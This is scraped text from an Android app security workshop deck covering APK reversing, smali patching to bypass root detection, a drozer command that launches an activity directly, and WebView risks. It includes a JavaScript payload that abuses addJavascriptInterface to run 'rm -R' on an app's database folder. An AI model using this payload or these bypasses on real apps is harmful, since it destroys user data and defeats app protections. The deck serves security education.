Upload
abhinav-sejpal
View
313
Download
6
Tags:
Embed Size (px)
Citation preview
WHO AM I
Next Generation problem Solver
Researcher & Reader in free time
Speaker at
Facilitator at Weekend Testing
Bug bounty Hunter (eX .Crowd Tester)
Reported Security Vulnerabilities for 50+ unique customers all over the world
including Apple, yahoo, Outlook, adobe & etc.
Love to develop nasty code & Hack it :)
Works as Security Researcher at
Certified Ethical Hacker AKA. Bug Wrangler
Null & OWASP Co mmunity
Accenture Digital Mobility
DISCLAIMER
This Presentation is intended for educational purposes only and I cannot be held liable for
any kind of damages done whatsoever to your machine, or other damages. Please - Don't try this attack on any others system without having context knowledge or
permission, this may harm to someone directly or indirectly.
Feel free to use this presentation for practice or education purpose.
It's no way related to my employer - its my own research and ideas.
^ I hope - You gotcha ^
SOCIAL MEDIA FEEDHashtag for this session
#NullHumla, #MobileSecurity
: Twitter handle for feedback :
@ @ null0x00 Abhinav_Sejpal
???
~ WE AREN'T GOING TO DO THIS ~
So, feel free to stop when you have a doubt!
Are you Ready to Rock
The Mobile market is fragmented, stakeholders want theirbetter cheaper faster mobile app - Correct?
What is if it's has Vulnerable code? WOW :D
- Yet to update the stats -
PREREQUISITES CHECKS
Genymotion Emulator Santoku Linux / Appie / Android Tamer Copy of Shared APK(s) : Here
BYPASS THE ACTIVITY VALIDATION
run app.activity.start --component sh.whisper
sh.whisper.WInboxActivity
[email protected] - Password!
Smali code Analysis
Step 1. Reversing the APK to the JAR File (JavA file)
dex2jar-2.0/ d2j-dex2jar.sh bank.apk
STEP 6. PREPARE LOGICAL PATCH
We can't patch the Java code and get the binary
- We have to patch the smali code with new logic of isRooted
~ SUMMARY ~
Demo on Missing Root Detection - Done Demo on Reversing the APK - DoneDemo on rebuild the APK - Done Demo on weak Binary - Done
Fix : Use the Dex Guard not the pro guard Update the logical validation - Done Identify attack surface at Smali code - Done Demo on Patch the Smali code - Done Demo on APK signing - Done Finally done the root detection bypass - Done
ANDROID WEB-VIEW Android allows apps to create a bridge in order to render
HTML , javascript code and allow interacting with the javacodes of the application using WebKit open source web
browser engine
70 % of applications use WebViews
THERE IS TWEAK WITH USAGE DISABLE SUPPORT FOR JAVASCRIPT DISABLE SUPPORT FOR PLUGINS DISABLE FILE SYSTEM ACCESS
WELL - HTTP VS HTTPS
WEBVIEW = NEW WEBVIEW(THIS);
WEBVIEW.GETSETTINGS().SETJAVASCRIPTENABLED(FALSE);
IDENTIFY THE APP WITH THE WEBKIT
- Reverse the binary -Find the webview code with addJavascriptinterface
enabled - Remember it's smali code -
MALICIOUS JS VECTOR <script>
var path = ' /data/data/com.box.android/databases/---';
function execute(cmd){
document.write("WebView Vulnerability");
return window.Android.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec(cmd);
}
execute([' /system/bin/rm', '-R', path]);
</script>
YES - I'M DONE!
Feel free to write me at bug.wrangler at outlook.com
Or
Tweet me at Abhinav_Sejpal
We need you!
Attend Null Meets-up & give presentations. Share your ideas & leanings. Talk to our community champions. Your feedback helps us to build a good community. Looking forward for your ongoing support.
http://null.co.in/
Say 'Hello' @null0x00
! THANK YOU !
@anantshri @oldmanlab @adi1391 @prateekg147@5h1vang @exploitprotocol
#Nullblr Leads & Champions
Big thank you to @null0x00, Satish, Apoorva & you All
LICENSE AND COPYRIGHTS
copyrights 2015-2016 https://slides.com/abhinavsejpal/bangalore-android-null-
humla/ Abhinav Sejpal
-----
( CC BY-NC-ND 3.0)
Attribution-NonCommercial-NoDerivs 3.0 Unported
Dedicated to my lovely daddy